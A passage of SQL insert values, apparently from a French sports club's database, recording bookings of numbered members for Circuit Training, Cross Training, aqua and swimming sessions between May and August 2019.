(15102, 380, 'CTR', '2019-05-09', '19h30', '20h30', 'Circuit Training'),
(15103, 399, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15104, 406, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15105, 387, 'CTR', '2019-05-09', '20h30', '21h30', 'Circuit Training'),
(15106, 388, 'CTR', '2019-05-09', '20h30', '21h30', 'Circuit Training'),
(15107, 405, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15108, 386, 'CTR', '2019-05-09', '20h30', '21h30', 'Circuit Training'),
(15109, 367, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15110, 393, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15111, 294, 'CTR', '2019-05-09', '18h30', '19h30', 'Circuit Training'),
(15112, 132, 'CTR', '2019-05-08', '20h00', '21h00', 'Cross Training'),
(15218, 365, 'CTR', '2019-05-20', '19h00', '20h00', 'Circuit Training'),
(15190, 231, 'CTR', '2019-05-15', '18h00', '19h00', 'Circuit Training'),
(15178, 304, 'CTR', '2019-05-13', '18h00', '19h00', 'Cross Training'),
(15191, 126, 'CTR', '2019-05-15', '18h00', '19h00', 'Circuit Training'),
(15117, 92, 'CTR', '2019-05-06', '18h00', '19h00', 'Cross Training'),
(15118, 339, 'CTR', '2019-05-06', '18h00', '19h00', 'Cross Training'),
(15119, 339, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15120, 231, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15121, 344, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15122, 316, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15123, 385, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15124, 394, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15125, 392, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15126, 402, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15127, 403, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15128, 401, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15129, 173, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15130, 247, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15131, 310, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15132, 348, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15133, 348, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15134, 230, 'CTR', '2019-05-08', '19h00', '20h00', 'Circuit Training'),
(15159, 92, 'CTR', '2019-05-09', '20h30', '21h30', 'Circuit Training'),
(15136, 383, 'CTR', '2019-05-08', '20h00', '21h00', 'Cross Training'),
(15155, 407, 'CTR', '2019-05-08', '20h00', '21h00', 'Cross Training'),
(15138, 180, 'CTR', '2019-05-08', '20h00', '21h00', 'Cross Training'),
(15139, 369, 'CTR', '2019-05-08', '20h00', '21h00', 'Cross Training'),
(15140, 165, 'CTR', '2019-05-08', '20h00', '21h00', 'Cross Training'),
(15141, 365, 'CTR', '2019-05-06', '19h00', '20h00', 'Circuit Training'),
(15148, 339, 'CTR', '2019-05-20', '19h00', '20h00', 'Circuit Training'),
(15143, 397, 'CTR', '2019-05-13', '18h00', '19h00', 'Cross Training'),
(15144, 398, 'CTR', '2019-05-13', '18h00', '19h00', 'Cross Training'),
(15145, 92, 'CTR', '2019-05-13', '18h00', '19h00', 'Cross Training'),
(15146, 231, 'CTR', '2019-05-13', '18h00', '19h00', 'Cross Training'),
(15147, 255, 'CTR', '2019-05-13', '18h00', '19h00', 'Cross Training'),
(15149, 230, 'CTR', '2019-05-13', '19h00', '20h00', 'Circuit Training'),
(15150, 398, 'CTR', '2019-05-13', '19h00', '20h00', 'Circuit Training'),
(15151, 365, 'CTR', '2019-05-13', '19h00', '20h00', 'Circuit Training'),
(15152, 397, 'CTR', '2019-05-08', '20h00', '21h00', 'Cross Training'),
(15153, 126, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15154, 80, 'CTR', '2019-05-08', '18h00', '19h00', 'Circuit Training'),
(15177, 375, 'CTR', '2019-05-16', '19h30', '20h30', 'Circuit Training'),
(15197, 394, 'CTR', '2019-05-16', '19h30', '20h30', 'Circuit Training'),
(15163, 381, 'CTR', '2019-05-16', '20h30', '21h30', 'Circuit Training'),
(15164, 408, 'CTR', '2019-05-16', '19h30', '20h30', 'Circuit Training'),
(15165, 408, 'CTR', '2019-05-16', '19h30', '20h30', 'Circuit Training'),
(15166, 379, 'CTR', '2019-05-16', '19h30', '20h30', 'Circuit Training'),
(15167, 380, 'CTR', '2019-05-16', '19h30', '20h30', 'Circuit Training'),
(15168, 399, 'CTR', '2019-05-16', '18h30', '19h30', 'Circuit Training'),
(15169, 406, 'CTR', '2019-05-16', '18h30', '19h30', 'Circuit Training'),
(15170, 405, 'CTR', '2019-05-16', '18h30', '19h30', 'Circuit Training'),
(15188, 80, 'CTR', '2019-05-23', '20h30', '21h30', 'Circuit Training'),
(15172, 80, 'CTR', '2019-05-16', '20h30', '21h30', 'Circuit Training'),
(15173, 393, 'CTR', '2019-05-16', '18h30', '19h30', 'Circuit Training'),
(15174, 294, 'CTR', '2019-05-16', '18h30', '19h30', 'Circuit Training'),
(15175, 367, 'CTR', '2019-05-16', '18h30', '19h30', 'Circuit Training'),
(15176, 386, 'CTR', '2019-05-16', '20h30', '21h30', 'Circuit Training'),
(15179, 92, 'CTR', '2019-05-15', '18h00', '19h00', 'Circuit Training'),
(15180, 231, 'CTR', '2019-05-20', '18h00', '19h00', 'Cross Training'),
(15181, 255, 'CTR', '2019-05-20', '18h00', '19h00', 'Cross Training'),
(15182, 397, 'CTR', '2019-05-20', '18h00', '19h00', 'Cross Training'),
(15183, 92, 'CTR', '2019-05-20', '18h00', '19h00', 'Cross Training'),
(15184, 398, 'CTR', '2019-05-20', '18h00', '19h00', 'Cross Training'),
(15185, 398, 'CTR', '2019-05-20', '19h00', '20h00', 'Circuit Training'),
(15186, 132, 'CTR', '2019-05-20', '19h00', '20h00', 'Circuit Training'),
(15187, 230, 'CTR', '2019-05-20', '19h00', '20h00', 'Circuit Training'),
(15192, 80, 'CTR', '2019-05-15', '18h00', '19h00', 'Circuit Training'),
(15193, 385, 'CTR', '2019-05-15', '18h00', '19h00', 'Circuit Training'),
(15194, 80, 'CTR', '2019-05-15', '18h00', '19h00', 'Circuit Training'),
(15220, 193, 'CTR', '2019-05-20', '18h00', '19h00', 'Cross Training'),
(15196, 193, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15198, 392, 'CTR', '2019-05-16', '19h30', '20h30', 'Circuit Training'),
(15199, 375, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15239, 375, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15201, 381, 'CTR', '2019-05-23', '19h30', '20h30', 'Circuit Training'),
(15202, 381, 'CTR', '2019-05-23', '20h30', '21h30', 'Circuit Training'),
(15369, 375, 'CTR', '2019-06-13', '18h30', '19h30', 'Circuit Training'),
(15204, 379, 'CTR', '2019-05-23', '19h30', '20h30', 'Circuit Training'),
(15205, 380, 'CTR', '2019-05-23', '19h30', '20h30', 'Circuit Training'),
(15206, 399, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15207, 406, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15222, 231, 'CTR', '2019-05-27', '18h00', '19h00', 'Cross Training'),
(15368, 375, 'CTR', '2019-06-13', '18h30', '19h30', 'Circuit Training'),
(15264, 375, 'CTR', '2019-06-06', '18h30', '19h30', 'Circuit Training'),
(15219, 385, 'CTR', '2019-05-20', '19h00', '20h00', 'Circuit Training'),
(15212, 405, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15213, 294, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15214, 367, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15215, 393, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15216, 386, 'CTR', '2019-05-23', '20h30', '21h30', 'Circuit Training'),
(15223, 255, 'CTR', '2019-05-27', '18h00', '19h00', 'Cross Training'),
(15221, 31, 'CTR', '2019-05-22', '18h00', '19h00', 'Circuit Training'),
(15224, 397, 'CTR', '2019-05-27', '18h00', '19h00', 'Cross Training'),
(15225, 398, 'CTR', '2019-05-27', '18h00', '19h00', 'Cross Training'),
(15226, 398, 'CTR', '2019-05-27', '19h00', '20h00', 'Circuit Training'),
(15227, 92, 'CTR', '2019-05-27', '18h00', '19h00', 'Cross Training'),
(15237, 409, 'CTR', '2019-05-23', '20h30', '21h30', 'Circuit Training'),
(15229, 370, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15230, 370, 'CTR', '2019-05-23', '18h30', '19h30', 'Circuit Training'),
(15231, 344, 'CTR', '2019-05-22', '18h00', '19h00', 'Circuit Training'),
(15232, 344, 'CTR', '2019-05-27', '18h00', '19h00', 'Cross Training'),
(15233, 339, 'CTR', '2019-05-27', '19h00', '20h00', 'Circuit Training'),
(15294, 339, 'CTR', '2019-06-10', '19h00', '20h00', 'Circuit Training'),
(15235, 132, 'CTR', '2019-05-27', '19h00', '20h00', 'Circuit Training'),
(15236, 365, 'CTR', '2019-05-27', '19h00', '20h00', 'Circuit Training'),
(15238, 385, 'CTR', '2019-05-27', '19h00', '20h00', 'Circuit Training'),
(15240, 92, 'CTR', '2019-05-23', '20h30', '21h30', 'Circuit Training'),
(15241, 80, 'CTR', '2019-05-22', '18h00', '19h00', 'Circuit Training'),
(15242, 385, 'CTR', '2019-05-22', '18h00', '19h00', 'Circuit Training'),
(15243, 231, 'CTR', '2019-05-22', '18h00', '19h00', 'Circuit Training'),
(15244, 316, 'CTR', '2019-05-22', '18h00', '19h00', 'Circuit Training'),
(15245, 401, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15246, 310, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15247, 247, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15248, 348, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15249, 348, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15250, 402, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15251, 403, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15252, 230, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15253, 173, 'CTR', '2019-05-22', '19h00', '20h00', 'Circuit Training'),
(15262, 385, 'CTR', '2019-05-22', '20h00', '21h00', 'Cross Training'),
(15265, 381, 'CTR', '2019-05-30', '19h30', '20h30', 'Circuit Training'),
(15256, 397, 'CTR', '2019-05-22', '20h00', '21h00', 'Cross Training'),
(15257, 132, 'CTR', '2019-05-22', '20h00', '21h00', 'Cross Training'),
(15258, 383, 'CTR', '2019-05-22', '20h00', '21h00', 'Cross Training'),
(15259, 365, 'CTR', '2019-05-22', '20h00', '21h00', 'Cross Training'),
(15261, 193, 'CTR', '2019-05-27', '19h00', '20h00', 'Circuit Training'),
(15346, 399, 'CTR', '2019-06-06', '18h30', '19h30', 'Circuit Training'),
(15345, 379, 'CTR', '2019-06-06', '19h30', '20h30', 'Circuit Training'),
(15268, 399, 'CTR', '2019-05-30', '18h30', '19h30', 'Circuit Training'),
(15458, 408, 'CTR', '2019-06-27', '19h30', '20h30', 'Circuit Training'),
(15270, 407, 'CTR', '2019-05-23', '19h30', '20h30', 'Circuit Training'),
(15271, 407, 'CTR', '2019-05-30', '18h30', '19h30', 'Circuit Training'),
(15272, 405, 'CTR', '2019-05-30', '18h30', '19h30', 'Circuit Training'),
(15273, 393, 'CTR', '2019-05-30', '18h30', '19h30', 'Circuit Training'),
(15274, 408, 'CTR', '2019-06-06', '19h30', '20h30', 'Circuit Training'),
(15366, 407, 'CTR', '2019-06-06', '19h30', '20h30', 'Circuit Training'),
(15276, 367, 'CTR', '2019-06-06', '18h30', '19h30', 'Circuit Training'),
(15277, 387, 'CTR', '2019-05-30', '19h30', '20h30', 'Circuit Training'),
(15278, 409, 'CTR', '2019-06-06', '20h30', '21h30', 'Circuit Training'),
(15348, 381, 'CTR', '2019-06-06', '19h30', '20h30', 'Circuit Training'),
(15280, 386, 'CTR', '2019-05-30', '19h30', '20h30', 'Circuit Training'),
(15281, 388, 'CTR', '2019-05-30', '19h30', '20h30', 'Circuit Training'),
(15282, 80, 'CTR', '2019-05-30', '19h30', '20h30', 'Circuit Training'),
(15284, 80, 'CTR', '2019-06-06', '20h30', '21h30', 'Circuit Training'),
(15285, 381, 'CTR', '2019-06-06', '20h30', '21h30', 'Circuit Training'),
(15286, 388, 'CTR', '2019-06-06', '20h30', '21h30', 'Circuit Training'),
(15361, 193, 'CTR', '2019-06-10', '19h00', '20h00', 'Circuit Training'),
(15288, 103, 'CTR', '2019-05-27', '19h00', '20h00', 'Circuit Training'),
(15289, 397, 'CTR', '2019-06-03', '18h00', '19h00', 'Cross Training'),
(15290, 92, 'CTR', '2019-06-03', '18h00', '19h00', 'Cross Training'),
(15291, 231, 'CTR', '2019-06-03', '18h00', '19h00', 'Cross Training'),
(15292, 255, 'CTR', '2019-06-03', '18h00', '19h00', 'Cross Training'),
(15293, 398, 'CTR', '2019-06-03', '18h00', '19h00', 'Cross Training'),
(15295, 132, 'CTR', '2019-06-03', '19h00', '20h00', 'Circuit Training'),
(15296, 385, 'CTR', '2019-06-03', '19h00', '20h00', 'Circuit Training'),
(15307, 48, 'CTR', '2019-05-29', '18h00', '19h00', 'Circuit Training'),
(15356, 397, 'CTR', '2019-06-10', '18h00', '19h00', 'Cross Training'),
(15299, 230, 'CTR', '2019-06-03', '19h00', '20h00', 'Circuit Training'),
(15300, 132, 'CTR', '2019-05-30', '18h30', '19h30', 'Circuit Training'),
(15301, 193, 'CTR', '2019-06-03', '19h00', '20h00', 'Circuit Training'),
(15363, 385, 'CTR', '2019-06-05', '18h00', '19h00', 'Circuit Training'),
(15303, 31, 'CTR', '2019-05-29', '18h00', '19h00', 'Circuit Training'),
(15304, 344, 'CTR', '2019-05-29', '18h00', '19h00', 'Circuit Training'),
(15305, 92, 'CTR', '2019-05-29', '18h00', '19h00', 'Circuit Training'),
(15306, 231, 'CTR', '2019-05-29', '18h00', '19h00', 'Circuit Training'),
(15308, 247, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15309, 310, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15311, 348, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15312, 348, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15313, 348, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15314, 230, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15315, 173, 'CTR', '2019-05-29', '18h00', '19h00', 'Circuit Training'),
(15316, 402, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15317, 403, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15318, 173, 'CTR', '2019-05-29', '19h00', '20h00', 'Circuit Training'),
(15319, 60, 'CTR', '2019-05-29', '20h00', '21h00', 'Cross Training'),
(15320, 60, 'CTR', '2019-05-29', '20h00', '21h00', 'Cross Training'),
(15321, 180, 'CTR', '2019-05-29', '20h00', '21h00', 'Cross Training'),
(15322, 132, 'CTR', '2019-05-29', '20h00', '21h00', 'Cross Training'),
(15323, 165, 'CTR', '2019-05-29', '20h00', '21h00', 'Cross Training'),
(15324, 397, 'CTR', '2019-05-29', '20h00', '21h00', 'Cross Training'),
(15386, 385, 'CTR', '2019-06-10', '19h00', '20h00', 'Circuit Training'),
(15365, 230, 'CTR', '2019-06-10', '19h00', '20h00', 'Circuit Training'),
(15362, 92, 'CTR', '2019-06-06', '20h30', '21h30', 'Circuit Training'),
(15328, 173, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15329, 402, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15330, 403, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15331, 247, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15332, 310, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15333, 230, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15334, 348, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15335, 348, 'CTR', '2019-06-05', '19h00', '20h00', 'Circuit Training'),
(15370, 381, 'CTR', '2019-06-13', '20h30', '21h30', 'Circuit Training'),
(15337, 180, 'CTR', '2019-06-05', '20h00', '21h00', 'Cross Training'),
(15338, 165, 'CTR', '2019-06-05', '20h00', '21h00', 'Cross Training'),
(15339, 60, 'CTR', '2019-06-05', '20h00', '21h00', 'Cross Training'),
(15340, 397, 'CTR', '2019-06-05', '20h00', '21h00', 'Cross Training'),
(15341, 132, 'CTR', '2019-06-05', '20h00', '21h00', 'Cross Training'),
(15342, 344, 'CTR', '2019-06-05', '18h00', '19h00', 'Circuit Training'),
(15347, 380, 'CTR', '2019-06-06', '19h30', '20h30', 'Circuit Training'),
(15350, 393, 'CTR', '2019-06-06', '18h30', '19h30', 'Circuit Training'),
(15351, 405, 'CTR', '2019-06-06', '18h30', '19h30', 'Circuit Training'),
(15353, 316, 'CTR', '2019-06-05', '18h00', '19h00', 'Circuit Training'),
(15371, 408, 'CTR', '2019-06-13', '19h30', '20h30', 'Circuit Training'),
(15355, 138, 'CTR', '2019-06-03', '18h00', '19h00', 'Cross Training'),
(15357, 92, 'CTR', '2019-06-10', '18h00', '19h00', 'Cross Training'),
(15358, 138, 'CTR', '2019-06-10', '18h00', '19h00', 'Cross Training'),
(15359, 231, 'CTR', '2019-06-10', '18h00', '19h00', 'Cross Training'),
(15360, 255, 'CTR', '2019-06-10', '18h00', '19h00', 'Cross Training'),
(15372, 379, 'CTR', '2019-06-13', '19h30', '20h30', 'Circuit Training'),
(15373, 380, 'CTR', '2019-06-13', '19h30', '20h30', 'Circuit Training'),
(15374, 399, 'CTR', '2019-06-13', '18h30', '19h30', 'Circuit Training'),
(15375, 406, 'CTR', '2019-06-13', '18h30', '19h30', 'Circuit Training'),
(15376, 387, 'CTR', '2019-06-13', '20h30', '21h30', 'Circuit Training'),
(15409, 375, 'CTR', '2019-06-20', '18h30', '19h30', 'Circuit Training'),
(15385, 92, 'CTR', '2019-06-13', '20h30', '21h30', 'Circuit Training'),
(15379, 388, 'CTR', '2019-06-13', '20h30', '21h30', 'Circuit Training'),
(15380, 386, 'CTR', '2019-06-13', '20h30', '21h30', 'Circuit Training'),
(15381, 367, 'CTR', '2019-06-13', '18h30', '19h30', 'Circuit Training'),
(15382, 393, 'CTR', '2019-06-20', '18h30', '19h30', 'Circuit Training'),
(15383, 410, 'CTR', '2019-06-13', '20h30', '21h30', 'Circuit Training'),
(15384, 405, 'CTR', '2019-06-13', '18h30', '19h30', 'Circuit Training'),
(15388, 132, 'CTR', '2019-06-10', '19h00', '20h00', 'Circuit Training'),
(15389, 92, 'CTR', '2019-06-17', '18h00', '19h00', 'Cross Training'),
(15426, 138, 'CTR', '2019-06-17', '18h00', '19h00', 'Cross Training'),
(15391, 397, 'CTR', '2019-06-17', '18h00', '19h00', 'Cross Training'),
(15392, 255, 'CTR', '2019-06-17', '18h00', '19h00', 'Cross Training'),
(15393, 231, 'CTR', '2019-06-17', '18h00', '19h00', 'Cross Training'),
(15394, 385, 'CTR', '2019-06-17', '19h00', '20h00', 'Circuit Training'),
(15395, 132, 'CTR', '2019-06-17', '19h00', '20h00', 'Circuit Training'),
(15396, 230, 'CTR', '2019-06-24', '19h00', '20h00', 'Circuit Training'),
(15397, 339, 'CTR', '2019-06-24', '19h00', '20h00', 'Circuit Training'),
(15398, 180, 'CTR', '2019-06-10', '19h00', '20h00', 'Circuit Training'),
(15399, 80, 'CTR', '2019-06-13', '19h30', '20h30', 'Circuit Training'),
(15400, 80, 'CTR', '2019-06-13', '19h30', '20h30', 'Circuit Training'),
(15401, 407, 'CTR', '2019-06-13', '19h30', '20h30', 'Circuit Training'),
(15402, 31, 'CTR', '2019-06-12', '18h00', '19h00', 'Circuit Training'),
(15403, 193, 'CTR', '2019-06-17', '19h00', '20h00', 'Circuit Training'),
(15404, 397, 'CTR', '2019-06-12', '20h00', '21h00', 'Cross Training'),
(15405, 193, 'CTR', '2019-06-12', '18h00', '19h00', 'Circuit Training'),
(15406, 103, 'CTR', '2019-06-12', '19h00', '20h00', 'Circuit Training'),
(15407, 344, 'CTR', '2019-06-12', '18h00', '19h00', 'Circuit Training'),
(15408, 231, 'CTR', '2019-06-12', '18h00', '19h00', 'Circuit Training'),
(15425, 193, 'CTR', '2019-06-24', '19h00', '20h00', 'Circuit Training'),
(15412, 381, 'CTR', '2019-06-20', '19h30', '20h30', 'Circuit Training'),
(15413, 381, 'CTR', '2019-06-20', '20h30', '21h30', 'Circuit Training'),
(15414, 408, 'CTR', '2019-06-20', '19h30', '20h30', 'Circuit Training'),
(15415, 379, 'CTR', '2019-06-20', '19h30', '20h30', 'Circuit Training'),
(15416, 380, 'CTR', '2019-06-20', '19h30', '20h30', 'Circuit Training'),
(15417, 399, 'CTR', '2019-06-20', '18h30', '19h30', 'Circuit Training'),
(15418, 406, 'CTR', '2019-06-20', '18h30', '19h30', 'Circuit Training'),
(15419, 387, 'CTR', '2019-06-20', '20h30', '21h30', 'Circuit Training'),
(15420, 409, 'CTR', '2019-06-20', '20h30', '21h30', 'Circuit Training'),
(15421, 80, 'CTR', '2019-06-20', '19h30', '20h30', 'Circuit Training'),
(15422, 386, 'CTR', '2019-06-20', '20h30', '21h30', 'Circuit Training'),
(15423, 388, 'CTR', '2019-06-20', '20h30', '21h30', 'Circuit Training'),
(15424, 410, 'CTR', '2019-06-20', '20h30', '21h30', 'Circuit Training'),
(15427, 92, 'CTR', '2019-06-24', '19h00', '20h00', 'Circuit Training'),
(15428, 231, 'CTR', '2019-06-24', '18h00', '19h00', 'Cross Training'),
(15429, 255, 'CTR', '2019-06-24', '18h00', '19h00', 'Cross Training'),
(15432, 397, 'CTR', '2019-06-24', '18h00', '19h00', 'Cross Training'),
(15431, 132, 'CTR', '2019-06-24', '19h00', '20h00', 'Circuit Training'),
(15433, 407, 'CTR', '2019-06-20', '19h30', '20h30', 'Circuit Training'),
(15434, 383, 'CTR', '2019-06-19', '20h00', '21h00', 'Cross Training'),
(15435, 31, 'CTR', '2019-06-19', '18h00', '19h00', 'Circuit Training'),
(15436, 344, 'CTR', '2019-06-19', '18h00', '19h00', 'Circuit Training'),
(15437, 231, 'CTR', '2019-06-19', '18h00', '19h00', 'Circuit Training'),
(15438, 173, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15439, 247, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15440, 403, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15441, 230, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15442, 401, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15443, 348, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15444, 348, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15445, 310, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15446, 402, 'CTR', '2019-06-19', '19h00', '20h00', 'Circuit Training'),
(15447, 397, 'CTR', '2019-06-19', '20h00', '21h00', 'Cross Training'),
(15448, 385, 'CTR', '2019-06-19', '20h00', '21h00', 'Cross Training'),
(15449, 132, 'CTR', '2019-06-19', '20h00', '21h00', 'Cross Training'),
(15472, 80, 'CTR', '2019-06-24', '18h00', '19h00', 'Cross Training'),
(15529, 193, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15452, 80, 'CTR', '2019-06-20', '19h30', '20h30', 'Circuit Training'),
(15453, 375, 'CTR', '2019-06-20', '18h30', '19h30', 'Circuit Training'),
(15454, 381, 'CTR', '2019-06-27', '19h30', '20h30', 'Circuit Training'),
(15457, 381, 'CTR', '2019-06-27', '20h30', '21h30', 'Circuit Training'),
(15493, 132, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15491, 80, 'CTR', '2019-06-27', '19h30', '20h30', 'Circuit Training'),
(15492, 126, 'CTR', '2019-06-27', '19h30', '20h30', 'Circuit Training'),
(15463, 80, 'CTR', '2019-06-27', '19h30', '20h30', 'Circuit Training'),
(15464, 80, 'CTR', '2019-06-27', '19h30', '20h30', 'Circuit Training'),
(15465, 387, 'CTR', '2019-06-27', '20h30', '21h30', 'Circuit Training'),
(15466, 409, 'CTR', '2019-06-27', '20h30', '21h30', 'Circuit Training'),
(15467, 388, 'CTR', '2019-06-27', '20h30', '21h30', 'Circuit Training'),
(15468, 386, 'CTR', '2019-06-27', '20h30', '21h30', 'Circuit Training'),
(15469, 410, 'CTR', '2019-06-27', '20h30', '21h30', 'Circuit Training'),
(15470, 80, 'CTR', '2019-06-24', '18h00', '19h00', 'Cross Training'),
(15471, 80, 'CTR', '2019-06-24', '18h00', '19h00', 'Cross Training'),
(15473, 31, 'CTR', '2019-06-26', '18h00', '19h00', 'Circuit Training'),
(15474, 231, 'CTR', '2019-06-26', '18h00', '19h00', 'Circuit Training'),
(15475, 126, 'CTR', '2019-06-26', '18h00', '19h00', 'Circuit Training'),
(15476, 173, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15477, 247, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15478, 310, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15479, 348, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15480, 348, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15481, 402, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15482, 403, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15483, 230, 'CTR', '2019-06-26', '19h00', '20h00', 'Circuit Training'),
(15484, 401, 'CTR', '2019-06-26', '20h00', '21h00', 'Cross Training'),
(15495, 397, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15494, 231, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15497, 80, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15496, 255, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15543, 402, 'CTR', '2019-07-17', '19h00', '20h00', 'Circuit Training'),
(15544, 173, 'CTR', '2019-07-10', '19h00', '20h00', 'Circuit Training'),
(15591, 386, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15642, 3, 'CTR', '2019-08-12', '17:15', '18:00', 'Natation'),
(15572, 132, 'CTR', '2019-07-18', '18h30', '19h30', 'Circuit Training'),
(15589, 388, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15570, 406, 'CTR', '0000-00-00', '18h30', '19h30', 'Circuit Training'),
(15593, 387, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15590, 410, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15588, 386, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15512, 413, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15538, 403, 'CTR', '2019-07-10', '19h00', '20h00', 'Circuit Training'),
(15539, 230, 'CTR', '2019-07-08', '19h30', '20h30', 'Circuit Training'),
(15549, 90, 'CTR', '2019-07-10', '19h00', '20h00', 'Circuit Training'),
(15613, 132, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15540, 180, 'CTR', '2019-07-08', '19h30', '20h30', 'Circuit Training'),
(15541, 413, 'CTR', '2019-07-08', '19h30', '20h30', 'Circuit Training'),
(15542, 412, 'CTR', '2019-07-08', '19h30', '20h30', 'Circuit Training'),
(15573, 412, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15574, 403, 'CTR', '2019-07-17', '19h00', '20h00', 'Circuit Training'),
(15528, 92, 'CTR', '2019-07-01', '18h30', '19h30', 'AQUA Cross Training : Prenez votre maillot!!'),
(15531, 397, 'CTR', '2019-07-08', '19h30', '20h30', 'Circuit Training'),
(15562, 367, 'CTR', '2019-07-15', '19h30', '20h30', 'Circuit Training'),
(15533, 132, 'CTR', '2019-07-08', '19h30', '20h30', 'Circuit Training'),
(15622, 384, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15547, 414, 'CTR', '2019-07-17', '19h00', '20h00', 'Circuit Training'),
(15614, 367, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15550, 230, 'CTR', '2019-07-10', '19h00', '20h00', 'Circuit Training'),
(15551, 367, 'CTR', '2019-07-10', '19h00', '20h00', 'Circuit Training'),
(15552, 31, 'CTR', '2019-07-10', '18h00', '19h00', 'Circuit Training'),
(15561, 132, 'CTR', '2019-07-17', '19h00', '20h00', 'Circuit Training'),
